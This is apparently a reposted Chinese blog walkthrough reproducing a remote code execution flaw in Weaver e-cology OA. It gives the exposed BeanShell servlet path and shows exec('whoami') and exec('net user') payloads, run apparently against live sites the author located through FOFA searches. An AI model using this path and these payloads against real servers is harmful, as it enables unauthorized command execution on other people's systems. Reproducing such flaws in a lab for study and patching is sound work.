泛微e-cology OA 远程代码执行漏洞复现


复现过程:

直接使用FOFA搜索语法搜索,找了好久才找到含有漏洞的站点。

在根目录后面输入漏洞路径:  /weaver/bsh.servlet.BshServlet

进入BeanShell操作页面

 在Script中输入语句,结果会在Script Output中输出。

输入exec("whoami")  结果如图,可知这个系统是windows系统,查看/etc/passwd就不用想了

使用exec("net user")查看本机用户。

 

 

如果想本地搭建环境复现可见https://github.com/jas502n/e-cology


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM